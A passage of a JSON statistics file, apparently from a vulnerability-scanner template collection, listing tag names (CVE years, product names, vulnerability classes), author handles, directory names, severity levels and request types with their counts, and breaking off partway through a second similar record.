ypass","count":12},{"name":"adobe","count":12},{"name":"android","count":12},{"name":"weblogic","count":12},{"name":"cve2011","count":11},{"name":"dns","count":11},{"name":"cve2012","count":11},{"name":"zoho","count":11},{"name":"springboot","count":11},{"name":"jenkins","count":10},{"name":"cve2013","count":10},{"name":"dlink","count":10},{"name":"devops","count":10},{"name":"cve2014","count":10},{"name":"php","count":10},{"name":"magento","count":9},{"name":"airflow","count":8},{"name":"aws","count":8},{"name":"cnvd","count":8},{"name":"router","count":8},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"ftp","count":8},{"name":"xxe","count":7},{"name":"nginx","count":7},{"name":"vmware","count":7},{"name":"scada","count":7},{"name":"joomla","count":7},{"name":"citrix","count":6},{"name":"coldfusion","count":6},{"name":"api","count":6},{"name":"cms","count":6},{"name":"rconfig","count":6},{"name":"google","count":6},{"name":"backup","count":6},{"name":"jetty","count":6},{"name":"django","count":5},{"name":"ibm","count":5},{"name":"iis","count":5},{"name":"cve2009","count":5},{"name":"ssti","count":5},{"name":"dedecms","count":5},{"name":"dell","count":5},{"name":"lucee","count":5},{"name":"files","count":5},{"name":"circarlife","count":5},{"name":"drupal","count":5},{"name":"confluence","count":5},{"name":"phpmyadmin","count":5},{"name":"login","count":5},{"name":"java","count":5},{"name":"netgear","count":5},{"name":"headless","count":5},{"name":"solr","count":5},{"name":"laravel","count":5},{"name":"ruijie","count":5},{"name":"artifactory","count":4},{"name":"asp","count":4},{"name":"samsung","count":4},{"name":"magmi","count":4},{"name":"tomcat","count":4},{"name":"hongdian","count":4},{"name":"vpn","count":4},{"name":"moodle","count":4},{"name":"fileupload","count":4},{"name":"jolokia","count":4},{"name":"docker","count":4},{"name":"crlf","count":4},{"name":"elastic","count":4},{"name":"nodejs","count":4},{"name":"thinkphp","count":4},{"name":"webserver","count":4},{"name":"solarwinds","count":4},{"name":"thinkcmf","count":4},{"name":"traversal","count":4},{"name":"mongodb","count":3},{"name":"fanruan","count":3},{"name":"targa","count":3},{"name":"ssh","count":3},{"name":"fpd","count":3},{"name":"kafka","count":3},{"name":"ofbiz","count":3},{"name":"vbulletin","count":3},{"name":"hp","count":3},{"name":"printer","count":3},{"name":"microstrategy","count":3},{"name":"terramaster","count":3},{"name":"r-seenet","count":3},{"name":"git","count":3},{"name":"amazon","count":3},{"name":"resin","count":3},{"name":"ebs","count":3},{"name":"windows","count":3},{"name":"oa","count":3},{"name":"grafana","count":3},{"name":"kubernetes","count":3},{"name":"bypass","count":3},{"name":"deserialization","count":3},{"name":"backups","count":3},{"name":"nacos","count":3},{"name":"openssh","count":3},{"name":"log","count":3},{"name":"cve2010","count":3},{"name":"nosqli","count":3},{"name":"slack","count":3},{"name":"springcloud","count":3},{"name":"caucho","count":3},{"name":"lfr","count":3},{"name":"kevinlab","count":2},{"name":"spark","count":2},{"name":"splunk","count":2},{"name":"telerik","count":2},{"name":"plesk","count":2},{"name":"sharepoint","count":2},{"name":"bitrix","count":2},{"name":"kibana","count":2},{"name":"couchdb","count":2},{"name":"seeyon","count":2},{"name":"hashicorp","count":2},{"name":"nextjs","count":2},{"name":"cve2007","count":2},{"name":"sonicwall","count":2},{"name":"linkerd","count":2},{"name":"openfire","count":2},{"name":"shellshock","count":2},{"name":"chiyu","count":2},{"name":"globalprotect","count":2},{"name":"frp","count":2},{"name":"icewarp","count":2},{"name":"emerge","count":2},{"name":"ucmdb","count":2},{"name":"wordfence","count":2},{"name":"dos","count":2},{"name":"paloalto","count":2},{"name":"openam","count":2},{"name":"zhiyuan","count":2},{"name":"nexus","count":2},{"name":"rockmongo","count":2},{"name":"mida","count":2},{"name":"sonarqube","count":2},{"name":"strapi","count":2},{"name":"cache","count":2},{"name":"saltstack","count":2},{"name":"rockethchat","count":2},{"name":"xxljob","count":2},{"name":"leak","count":2},{"name":"bigip","count":2},{"name":"vrealize","count":2},{"name":"waf","count":2},{"name":"huawei","count":2},{"name":"jellyfin","count":2},{"name":"glassfish","count":2},{"name":"oauth","count":2},{"name":"showdoc","count":2},{"name":"rstudio","count":2},{"name":"smb","count":2},{"name":"natshell","count":2},{"name":"odoo","count":2},{"name":"jboss","count":2},{"name":"chamilo","count":2},{"name":"kentico","count":2},{"name":"prometheus","count":2},{"name":"idrac","count":2},{"name":"proxy","count":2},{"name":"activemq","count":2},{"name":"microsoft","count":2},{"name":"ecology","count":2},{"name":"voipmonitor","count":2},{"name":"cve2008","count":2},{"name":"fortios","count":2},{"name":"mail","count":2},{"name":"hpe","count":2},{"name":"injection","count":2},{"name":"igs","count":2},{"name":"webcam","count":2},{"name":"flir","count":2},{"name":"zabbix","count":2},{"name":"pega","count":2},{"name":"smtp","count":2},{"name":"service","count":2},{"name":"hjtcloud","count":2},{"name":"trixbox","count":2},{"name":"httpd","count":2},{"name":"yapi","count":2},{"name":"intrusive","count":2},{"name":"maian","count":2},{"name":"nagios","count":2},{"name":"keycloak","count":2},{"name":"checkpoint","count":1},{"name":"mediumish","count":1},{"name":"solman","count":1},{"name":"yii","count":1},{"name":"codeigniter","count":1},{"name":"jnoj","count":1},{"name":"dotclear","count":1},{"name":"pippoint","count":1},{"name":"fuelcms","count":1},{"name":"postmessage","count":1},{"name":"wiki","count":1},{"name":"redcap","count":1},{"name":"emby","count":1},{"name":"clave","count":1},{"name":"idemia","count":1},{"name":"druid","count":1},{"name":"bolt","count":1},{"name":"payara","count":1},{"name":"dotnetnuke","count":1},{"name":"wildfly","count":1},{"name":"floc","count":1},{"name":"postgres","count":1},{"name":"jeewms","count":1},{"name":"flash","count":1},{"name":"monitorr","count":1},{"name":"socomec","count":1},{"name":"favicon","count":1},{"name":"hasura","count":1},{"name":"metinfo","count":1},{"name":"csod","count":1},{"name":"heroku","count":1},{"name":"discourse","count":1},{"name":"nuxeo","count":1},{"name":"totaljs","count":1},{"name":"redis","count":1},{"name":"ambari","count":1},{"name":"exchange","count":1},{"name":"wamp","count":1},{"name":"akkadian","count":1},{"name":"viewpoint","count":1},{"name":"sidekiq","count":1},{"name":"cloudflare","count":1},{"name":"avtech","count":1},{"name":"fiori","count":1},{"name":"visualtools","count":1},{"name":"linksys","count":1},{"name":"cobub","count":1},{"name":"spring","count":1},{"name":"majordomo2","count":1},{"name":"phpfusion","count":1},{"name":"zzzcms","count":1},{"name":"bruteforce","count":1},{"name":"svnserve","count":1},{"name":"panabit","count":1},{"name":"bullwark","count":1},{"name":"geutebruck","count":1},{"name":"concrete","count":1},{"name":"wp-theme","count":1},{"name":"backdoor","count":1},{"name":"viewlinc","count":1},{"name":"mautic","count":1},{"name":"ruckus","count":1},{"name":"rujjie","count":1},{"name":"kong","count":1},{"name":"tileserver","count":1},{"name":"webftp","count":1},{"name":"erp-nc","count":1},{"name":"jsp","count":1},{"name":"xdcms","count":1},{"name":"bookstack","count":1},{"name":"htmli","count":1},{"name":"plone","count":1},{"name":"akamai","count":1},{"name":"trilithic","count":1},{"name":"nps","count":1},{"name":"zend","count":1},{"name":"panos","count":1},{"name":"zm","count":1},{"name":"aspnuke","count":1},{"name":"soar","count":1},{"name":"livezilla","count":1},{"name":"finereport","count":1},{"name":"sprintful","count":1},{"name":"beanshell","count":1},{"name":"netis","count":1},{"name":"rabbitmq","count":1},{"name":"primetek","count":1},{"name":"avalanche","count":1},{"name":"comodo","count":1},{"name":"gloo","count":1},{"name":"haproxy","count":1},{"name":"firebase","count":1},{"name":"commscope","count":1},{"name":"accela","count":1},{"name":"clusterengine","count":1},{"name":"horde","count":1},{"name":"tongda","count":1},{"name":"kubeflow","count":1},{"name":"optiLink","count":1},{"name":"xff","count":1},{"name":"jenkin","count":1},{"name":"fastcgi","count":1},{"name":"gitlist","count":1},{"name":"stem","count":1},{"name":"setup","count":1},{"name":"node","count":1},{"name":"mongoshake","count":1},{"name":"zimbra","count":1},{"name":"rsyncd","count":1},{"name":"krweb","count":1},{"name":"mariadb","count":1},{"name":"opm","count":1},{"name":"k8","count":1},{"name":"openrestry","count":1},{"name":"node-red-dashboard","count":1},{"name":"szhe","count":1},{"name":"sqlite","count":1},{"name":"springframework","count":1},{"name":"lighttpd","count":1},{"name":"jenzabar","count":1},{"name":"cocoon","count":1},{"name":"ricoh","count":1},{"name":"nuuo","count":1},{"name":"cloudinary","count":1},{"name":"moin","count":1},{"name":"uwsgi","count":1},{"name":"octobercms","count":1},{"name":"pulsesecure","count":1},{"name":"webmin","count":1},{"name":"netrc","count":1},{"name":"chevereto","count":1},{"name":"mantisbt","count":1},{"name":"diris","count":1},{"name":"apos","count":1},{"name":"eyou","count":1},{"name":"plugin","count":1},{"name":"klog","count":1},{"name":"grails","count":1},{"name":"glances","count":1},{"name":"fastapi","count":1},{"name":"nomad","count":1},{"name":"moinmoin","count":1},{"name":"swagger","count":1},{"name":"ns","count":1},{"name":"ntopng","count":1},{"name":"mongo","count":1},{"name":"javafaces","count":1},{"name":"netsweeper","count":1},{"name":"rdp","count":1},{"name":"lanproxy","count":1},{"name":"landrayoa","count":1},{"name":"sentry","count":1},{"name":"mirai","count":1},{"name":"2014","count":1},{"name":"wmt","count":1},{"name":"timesheet","count":1},{"name":"ssltls","count":1},{"name":"cse","count":1},{"name":"acme","count":1},{"name":"starttls","count":1},{"name":"selea","count":1},{"name":"visionhub","count":1},{"name":"kafdrop","count":1},{"name":"skywalking","count":1},{"name":"proftpd","count":1},{"name":"dotnet","count":1},{"name":"spectracom","count":1},{"name":"nexusdb","count":1},{"name":"addpac","count":1},{"name":"hiboss","count":1},{"name":"centos","count":1},{"name":"varnish","count":1},{"name":"domxss","count":1},{"name":"xiuno","count":1},{"name":"glpi","count":1},{"name":"status","count":1},{"name":"alibaba","count":1},{"name":"fedora","count":1},{"name":"hortonworks","count":1},{"name":"monitorix","count":1},{"name":"chinaunicom","count":1},{"name":"mysql","count":1},{"name":"vscode","count":1},{"name":"webadmin","count":1},{"name":"ssl","count":1},{"name":"alerta","count":1},{"name":"wifisky","count":1},{"name":"expressjs","count":1},{"name":"webmodule-ee","count":1},{"name":"dlogin","count":1},{"name":"ganglia","count":1},{"name":"nordex","count":1},{"name":"shopware","count":1},{"name":"pacsone","count":1},{"name":"zeroshell","count":1},{"name":"javascript","count":1},{"name":"jsf","count":1},{"name":"empirecms","count":1},{"name":"mdb","count":1},{"name":"kyan","count":1},{"name":"landray","count":1},{"name":"interlib","count":1},{"name":"vsftpd","count":1},{"name":"fortigate","count":1},{"name":"oscommerce","count":1},{"name":"eprints","count":1},{"name":"sco","count":1},{"name":"feifeicms","count":1},{"name":"sceditor","count":1},{"name":"linkedin","count":1},{"name":"pgadmin","count":1},{"name":"sitecore","count":1},{"name":"servicedesk","count":1},{"name":"weiphp","count":1},{"name":"zenario","count":1},{"name":"ruby","count":1},{"name":"spf","count":1},{"name":"hadoop","count":1},{"name":"emc","count":1},{"name":"subrion","count":1},{"name":"iptime","count":1},{"name":"wso2","count":1},{"name":"tpshop","count":1},{"name":"seacms","count":1},{"name":"acexy","count":1},{"name":"cacti","count":1},{"name":"b2evolution","count":1},{"name":"arl","count":1},{"name":"goahead","count":1},{"name":"fortilogger","count":1},{"name":"cve2005","count":1},{"name":"jfrog","count":1},{"name":"parentlink","count":1},{"name":"zcms","count":1},{"name":"mobileiron","count":1},{"name":"upload","count":1},{"name":"discord","count":1},{"name":"fortiweb","count":1},{"name":"episerver","count":1},{"name":"synnefo","count":1},{"name":"traefik","count":1},{"name":"shopxo","count":1},{"name":"huijietong","count":1},{"name":"yachtcontrol","count":1},{"name":"zte","count":1},{"name":"fortinet","count":1},{"name":"email","count":1},{"name":"robomongo","count":1},{"name":"portainer","count":1},{"name":"rmi","count":1},{"name":"tamronos","count":1},{"name":"extractor","count":1},{"name":"mantis","count":1},{"name":"tensorflow","count":1},{"name":"rfi","count":1},{"name":"faraday","count":1},{"name":"vnc","count":1},{"name":"tensorboard","count":1},{"name":"spidercontrol","count":1},{"name":"svn","count":1},{"name":"redhat","count":1},{"name":"bedita","count":1},{"name":"lotuscms","count":1},{"name":"timeclock","count":1},{"name":"sangfor","count":1},{"name":"turbocrm","count":1},{"name":"zmanda","count":1},{"name":"zookeeper","count":1},{"name":"etouch","count":1},{"name":"rhymix","count":1},{"name":"tika","count":1},{"name":"nedi","count":1},{"name":"cors","count":1},{"name":"liferay","count":1},{"name":"phalcon","count":1},{"name":"opentsdb","count":1},{"name":"nette","count":1},{"name":"bitly","count":1},{"name":"expose","count":1},{"name":"npm","count":1},{"name":"doh","count":1},{"name":"openerp","count":1},{"name":"ems","count":1},{"name":"ulterius","count":1},{"name":"mara","count":1},{"name":"phpunit","count":1},{"name":"geddy","count":1},{"name":" default-login","count":1},{"name":"nsasg","count":1},{"name":"dom","count":1},{"name":"woocomernce","count":1},{"name":"rubedo","count":1},{"name":"ueditor","count":1},{"name":"memcached","count":1},{"name":"circontrol","count":1},{"name":"dompdf","count":1},{"name":"openstack","count":1},{"name":"maccmsv10","count":1},{"name":"scimono","count":1},{"name":"redwood","count":1},{"name":"harbor","count":1},{"name":"pagespeed","count":1},{"name":"enumeration","count":1},{"name":"wuzhicms","count":1},{"name":"smartsense","count":1},{"name":"biometrics","count":1},{"name":"manageengine","count":1},{"name":"lansweeper","count":1},{"name":"saltapi","count":1},{"name":"gogs","count":1},{"name":"magicflow","count":1},{"name":"xml","count":1},{"name":"labtech","count":1},{"name":"circontrorl","count":1},{"name":"upnp","count":1},{"name":"opensmtpd","count":1},{"name":"embedthis","count":1},{"name":"wavlink","count":1},{"name":"csrf","count":1},{"name":"lancom","count":1},{"name":"scs","count":1},{"name":"lutron","count":1},{"name":"h3c-imc","count":1},{"name":"calendarix","count":1},{"name":"aura","count":1},{"name":"wavemaker","count":1},{"name":"kerbynet","count":1},{"name":"servicenow","count":1},{"name":"plastic","count":1},{"name":"drone","count":1},{"name":"dvwa","count":1},{"name":"crm","count":1},{"name":"expn","count":1},{"name":"jitsi","count":1},{"name":"xunchi","count":1},{"name":"flink","count":1},{"name":"db","count":1},{"name":"ilo4","count":1},{"name":"tenda","count":1},{"name":"websvn","count":1},{"name":"gridx","count":1},{"name":"anchorcms","count":1},{"name":"apiman","count":1},{"name":"bash","count":1},{"name":"exacqvision","count":1},{"name":"grav","count":1},{"name":"jquery","count":1},{"name":"dvr","count":1},{"name":"duomicms","count":1},{"name":"alertmanager","count":1},{"name":"myucms","count":1},{"name":"tapestry","count":1},{"name":"codemeter","count":1},{"name":"ecom","count":1},{"name":"wazuh","count":1},{"name":"xmlchart","count":1},{"name":"azure","count":1},{"name":"gateone","count":1},{"name":"octoprint","count":1},{"name":"salesforce","count":1},{"name":"javamelody","count":1},{"name":"phpinfo","count":1},{"name":"axis","count":1},{"name":"mpsec","count":1},{"name":"appweb","count":1},{"name":"opencast","count":1},{"name":"esmtp","count":1},{"name":"sarg","count":1},{"name":"fortigates","count":1},{"name":"thinkadmin","count":1},{"name":"itop","count":1},{"name":"blind","count":1},{"name":"symfony","count":1},{"name":"zarafa","count":1},{"name":"razor","count":1},{"name":"jmx","count":1},{"name":"mailchimp","count":1},{"name":"74cms","count":1},{"name":"enum","count":1},{"name":"netdata","count":1},{"name":"k8s","count":1},{"name":"st","count":1},{"name":"blue-ocean","count":1},{"name":"vsphere","count":1},{"name":"mcafee","count":1},{"name":"triconsole","count":1},{"name":"blackboard","count":1},{"name":"wooyun","count":1},{"name":"clockwatch","count":1},{"name":"realteo","count":1},{"name":"plc","count":1},{"name":"pyramid","count":1},{"name":"rmc","count":1},{"name":"adminer","count":1},{"name":"darkstat","count":1},{"name":"keenetic","count":1},{"name":"cgi","count":1},{"name":"ioncube","count":1},{"name":"nc2","count":1},{"name":"webui","count":1},{"name":"powercreator","count":1},{"name":"opensns","count":1},{"name":"ec2","count":1}],"authors":[{"name":"dhiyaneshdk","count":220},{"name":"pikpikcu","count":195},{"name":"pdteam","count":187},{"name":"dwisiswant0","count":126},{"name":"geeknik","count":119},{"name":"daffainfo","count":99},{"name":"madrobot","count":60},{"name":"princechaddha","count":52},{"name":"gy741","count":49},{"name":"gaurang","count":42},{"name":"pussycat0x","count":34},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":20},{"name":"sheikhrishad","count":15},{"name":"philippedelteil","count":14},{"name":"milo2012","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"wdahlenb","count":9},{"name":"melbadry9","count":8},{"name":"aashiq","count":8},{"name":"nadino","count":8},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"hackergautam","count":8},{"name":"dr_set","count":7},{"name":"0x240x23elu","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"r3dg33k","count":7},{"name":"emadshanab","count":7},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"panch0r3d","count":5},{"name":"ganofins","count":5},{"name":"pentest_swissky","count":5},{"name":"yanyun","count":5},{"name":"joanbono","count":5},{"name":"e_schultze_","count":4},{"name":"elsfa7110","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"nodauf","count":4},{"name":"rootxharsh","count":4},{"name":"iamnoooob","count":4},{"name":"meme-lord","count":4},{"name":"mavericknerd","count":3},{"name":"dudez","count":3},{"name":"impramodsargar","count":3},{"name":"_generic_human_","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"0w4ys","count":3},{"name":"jarijaas","count":3},{"name":"f1tz","count":3},{"name":"fyoorer","count":3},{"name":"thomas_from_offensity","count":3},{"name":"tess","count":3},{"name":"z3bd","count":3},{"name":"binaryfigments","count":3},{"name":"shine","count":3},{"name":"manas_harsh","count":2},{"name":"lotusdll","count":2},{"name":"ehsahil","count":2},{"name":"bing0o","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"randomrobbie","count":2},{"name":"vavkamil","count":2},{"name":"moritz nentwig","count":2},{"name":"gevakun","count":2},{"name":"afaq","count":2},{"name":"0xsapra","count":2},{"name":"0xrudra","count":2},{"name":"hetroublemakr","count":2},{"name":"foulenzer","count":2},{"name":"shifacyclewala","count":2},{"name":"bsysop","count":2},{"name":"davidmckennirey","count":2},{"name":"joeldeleep","count":2},{"name":"0xprial","count":2},{"name":"swissky","count":2},{"name":"w4cky_","count":2},{"name":"nkxxkn","count":2},{"name":"fabaff","count":2},{"name":"amsda","count":2},{"name":"incogbyte","count":2},{"name":"unstabl3","count":2},{"name":"kiblyn11","count":2},{"name":"0xcrypto","count":2},{"name":"0xelkomy","count":2},{"name":"zomsop82","count":2},{"name":"lu4nx","count":2},{"name":"x1m_martijn","count":2},{"name":"random-robbie","count":2},{"name":"pxmme1337","count":2},{"name":"emenalf","count":2},{"name":"bp0lr","count":2},{"name":"dheerajmadhukar","count":2},{"name":"udit_thakkur","count":2},{"name":"koti2","count":2},{"name":"ree4pwn","count":2},{"name":"vzamanillo","count":1},{"name":"akshansh","count":1},{"name":"tirtha_mandal","count":1},{"name":"luci","count":1},{"name":"johnk3r","count":1},{"name":"akash.c","count":1},{"name":"thezakman","count":1},{"name":"s1r1u5_","count":1},{"name":"vsh00t","count":1},{"name":"sullo","count":1},{"name":"blckraven","count":1},{"name":"c3l3si4n","count":1},{"name":"smaranchand","count":1},{"name":"mohammedsaneem","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"dogasantos","count":1},{"name":"shelld3v","count":1},{"name":"revblock","count":1},{"name":"petruknisme","count":1},{"name":"un-fmunozs","count":1},{"name":"b0yd","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"ipanda","count":1},{"name":"0xtavian","count":1},{"name":"bernardofsr","count":1},{"name":"jteles","count":1},{"name":"ohlinge","count":1},{"name":"regala_","count":1},{"name":"notsoevilweasel","count":1},{"name":"andysvints","count":1},{"name":"whynotke","count":1},{"name":"undefl0w","count":1},{"name":"johnjhacking","count":1},{"name":"gboddin","count":1},{"name":"gal nagli","count":1},{"name":"0xrod","count":1},{"name":"fopina","count":1},{"name":"andirrahmani1","count":1},{"name":"sicksec","count":1},{"name":"makyotox","count":1},{"name":"rojanrijal","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"sshell","count":1},{"name":"d0rkerdevil","count":1},{"name":"bjhulst","count":1},{"name":"taielab","count":1},{"name":"mubassirpatel","count":1},{"name":"rtcms","count":1},{"name":"abison_binoy","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"r3naissance","count":1},{"name":"exploitation","count":1},{"name":"b4uh0lz","count":1},{"name":"remonsec","count":1},{"name":"micha3lb3n","count":1},{"name":"rodnt","count":1},{"name":"shreyapohekar","count":1},{"name":"aresx","count":1},{"name":"deena","count":1},{"name":"kabirsuda","count":1},{"name":"j33n1k4","count":1},{"name":"arcc","count":1},{"name":"pdp","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"zandros0","count":1},{"name":"affix","count":1},{"name":"nytr0gen","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"dawid czarnecki","count":1},{"name":"tim_koopmans","count":1},{"name":"ahmed sherif","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"bolli95","count":1},{"name":"berkdusunur","count":1},{"name":"jeya seelan","count":1},{"name":"apt-mirror","count":1},{"name":"mhdsamx","count":1},{"name":"divya_mudgal","count":1},{"name":"omarkurt","count":1},{"name":"ajaysenr","count":1},{"name":"becivells","count":1},{"name":"toufik airane","count":1},{"name":"furkansenan","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"kurohost","count":1},{"name":"mah3sec_","count":1},{"name":"ringo","count":1},{"name":"schniggie","count":1},{"name":"streetofhackerr007","count":1},{"name":"cookiehanhoan","count":1},{"name":"th3.d1p4k","count":1},{"name":"raesene","count":1},{"name":"@dwisiswant0","count":1},{"name":"retr0","count":1},{"name":"0xteles","count":1},{"name":"daviey","count":1},{"name":"hanlaomo","count":1},{"name":"sy3omda","count":1},{"name":"pudsec","count":1},{"name":"hakluke","count":1},{"name":"bad5ect0r","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"willd96","count":1},{"name":"thevillagehacker","count":1},{"name":"naglinagli","count":1},{"name":"alifathi-h1","count":1},{"name":"chron0x","count":1},{"name":"absshax","count":1},{"name":"_harleo","count":1},{"name":"yashgoti","count":1},{"name":"kareemse1im","count":1},{"name":"qlkwej","count":1},{"name":"soyelmago","count":1},{"name":"alperenkesk","count":1},{"name":"manuelbua","count":1},{"name":"wabafet","count":1},{"name":"noamrathaus","count":1},{"name":"geraldino2","count":1},{"name":"elmahdi","count":1},{"name":"ldionmarcil","count":1},{"name":"iampritam","count":1},{"name":"shifacyclewla","count":1},{"name":"patralos","count":1},{"name":"yashanand155","count":1},{"name":"sickwell","count":1},{"name":"luskabol","count":1},{"name":"0ut0fb4nd","count":1},{"name":"yavolo","count":1},{"name":"ooooooo_q","count":1},{"name":"defr0ggy","count":1},{"name":"_c0wb0y_","count":1},{"name":"its0x08","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"co0nan","count":1},{"name":"knassar702","count":1},{"name":"flag007","count":1},{"name":"fmunozs","count":1},{"name":"zhenwarx","count":1},{"name":"alph4byt3","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"juicypotato1","count":1},{"name":"52971","count":1},{"name":"alex","count":1},{"name":"0h1in9e","count":1},{"name":"_darrenmartyn","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"ilovebinbash","count":1},{"name":"idealphase","count":1},{"name":"g4l1t0 and @convisoappsec","count":1}],"directory":[{"name":"cves","count":519},{"name":"vulnerabilities","count":246},{"name":"exposed-panels","count":204},{"name":"exposures","count":168},{"name":"technologies","count":136},{"name":"misconfiguration","count":115},{"name":"takeovers","count":70},{"name":"default-logins","count":49},{"name":"file","count":42},{"name":"workflows","count":34},{"name":"miscellaneous","count":27},{"name":"network","count":27},{"name":"iot","count":22},{"name":"dns","count":10},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":535},{"name":"high","count":426},{"name":"medium","count":349},{"name":"critical","count":202},{"name":"low","count":147}],"types":[{"name":"http","count":1567},{"name":"file","count":42},{"name":"network","count":35},{"name":"dns","count":10}]} +{"tags":[{"name":"cve","count":511},{"name":"panel","count":202},{"name":"xss","count":182},{"name":"wordpress","count":180},{"name":"exposure","count":176},{"name":"rce","count":173},{"name":"cve2020","count":145},{"name":"lfi","count":143},{"name":"wp-plugin","count":120},{"name":"config","count":90},{"name":"cve2021","count":83},{"name":"cve2019","count":82},{"name":"tech","count":78},{"name":"takeover","count":72},{"name":"cve2018","count":66},{"name":"","count":66},{"name":"token","count":63},{"name":"apache","count":61},{"name":"default-login","count":50},{"name":"iot","count":43},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":40},{"name":"network","count":35},{"name":"sqli","count":34},{"name":"oob","count":32},{"name":"logs","count":29},{"name":"workflow","count":29},{"name":"oracle","count":29},{"name":"ssrf","count":27},{"name":"misc","count":27},{"name":"jira","count":26},{"name":"atlassian","count":26},{"name":"disclosure","count":25},{"name":"cve2016","count":23},{"name":"listing","count":22},{"name":"redirect","count":20},{"name":"aem","count":19},{"name":"cisco","count":17},{"name":"sap","count":16},{"name":"debug","count":14},{"name":"fuzz","count":13},{"name":"misconfig","count":13},{"name":"struts","count":13},{"name":"cve2015","count":13},{"name":"adobe","count":12},{"name":"weblogic","count":12},{"name":"android","count":12},{"name":"auth-bypass","count":12},{"name":"zoho","count":11},{"name":"springboot","count":11},{"name":"cve2011","count":11},{"name":"dns","count":11},{"name":"cve2012","count":11},{"name":"dlink","count":10},{"name":"jenkins","count":10},{"name":"cve2014","count":10},{"name":"php","count":10},{"name":"cve2013","count":10},{"name":"devops","count":10},{"name":"magento","count":9},{"name":"gitlab","count":8},{"name":"router","count":8},{"name":"ftp","count":8},{"name":"airflow","count":8},{"name":"aws","count":8},{"name":"rails","count":8},{"name":"cnvd","count":8},{"name":"vmware","count":7},{"name":"xxe","count":7},{"name":"joomla","count":7},{"name":"nginx","count":7},{"name":"scada","count":7},{"name":"citrix","count":6},{"name":"api","count":6},{"name":"cms","count":6},{"name":"rconfig","count":6},{"name":"backup","count":6},{"name":"coldfusion","count":6},{"name":"jetty","count":6},{"name":"google","count":6},{"name":"java","count":5},{"name":"headless","count":5},{"name":"netgear","count":5},{"name":"confluence","count":5},{"name":"circarlife","count":5},{"name":"drupal","count":5},{"name":"cve2009","count":5},{"name":"phpmyadmin","count":5},{"name":"ruijie","count":5},{"name":"dedecms","count":5},{"name":"iis","count":5},{"name":"dell","count":5},{"name":"laravel","count":5},{"name":"files","count":5},{"name":"login","count":5},{"name":"lucee","count":5},{"name":"solr","count":5},{"name":"ssti","count":5},{"name":"django","count":5},{"name":"ibm","count":5},{"name":"fileupload","count":4},{"name":"solarwinds","count":4},{"name":"webserver","count":4},{"name":"tomcat","count":4},{"name":"elastic","count":4},{"name":"moodle","count":4},{"name":"jolokia","count":4},{"name":"docker","count":4},{"name":"crlf","count":4},{"name":"hongdian","count":4},{"name":"nodejs","count":4},{"name":"traversal","count":4},{"name":"vpn","count":4},{"name":"magmi","count":4},{"name":"samsung","count":4},{"name":"thinkphp","count":4},{"name":"asp","count":4},{"name":"thinkcmf","count":4},{"name":"artifactory","count":4},{"name":"openssh","count":3},{"name":"vbulletin","count":3},{"name":"deserialization","count":3},{"name":"log","count":3},{"name":"fpd","count":3},{"name":"bypass","count":3},{"name":"fanruan","count":3},{"name":"nacos","count":3},{"name":"windows","count":3},{"name":"git","count":3},{"name":"resin","count":3},{"name":"cve2010","count":3},{"name":"targa","count":3},{"name":"springcloud","count":3},{"name":"hp","count":3},{"name":"oa","count":3},{"name":"kubernetes","count":3},{"name":"grafana","count":3},{"name":"r-seenet","count":3},{"name":"ssh","count":3},{"name":"slack","count":3},{"name":"backups","count":3},{"name":"mongodb","count":3},{"name":"terramaster","count":3},{"name":"nosqli","count":3},{"name":"printer","count":3},{"name":"ebs","count":3},{"name":"amazon","count":3},{"name":"ofbiz","count":3},{"name":"kafka","count":3},{"name":"microstrategy","count":3},{"name":"caucho","count":3},{"name":"lfr","count":3},{"name":"sonarqube","count":2},{"name":"shellshock","count":2},{"name":"fortios","count":2},{"name":"strapi","count":2},{"name":"dos","count":2},{"name":"saltstack","count":2},{"name":"showdoc","count":2},{"name":"openam","count":2},{"name":"cve2007","count":2},{"name":"frp","count":2},{"name":"nagios","count":2},{"name":"proxy","count":2},{"name":"seeyon","count":2},{"name":"keycloak","count":2},{"name":"cve2008","count":2},{"name":"bitrix","count":2},{"name":"smb","count":2},{"name":"plesk","count":2},{"name":"injection","count":2},{"name":"spark","count":2},{"name":"nexus","count":2},{"name":"openfire","count":2},{"name":"rockethchat","count":2},{"name":"jboss","count":2},{"name":"sharepoint","count":2},{"name":"kibana","count":2},{"name":"nextjs","count":2},{"name":"vrealize","count":2},{"name":"emerge","count":2},{"name":"leak","count":2},{"name":"cache","count":2},{"name":"yapi","count":2},{"name":"sonicwall","count":2},{"name":"prometheus","count":2},{"name":"paloalto","count":2},{"name":"microsoft","count":2},{"name":"trixbox","count":2},{"name":"kevinlab","count":2},{"name":"xxljob","count":2},{"name":"intrusive","count":2},{"name":"voipmonitor","count":2},{"name":"huawei","count":2},{"name":"hjtcloud","count":2},{"name":"mail","count":2},{"name":"rstudio","count":2},{"na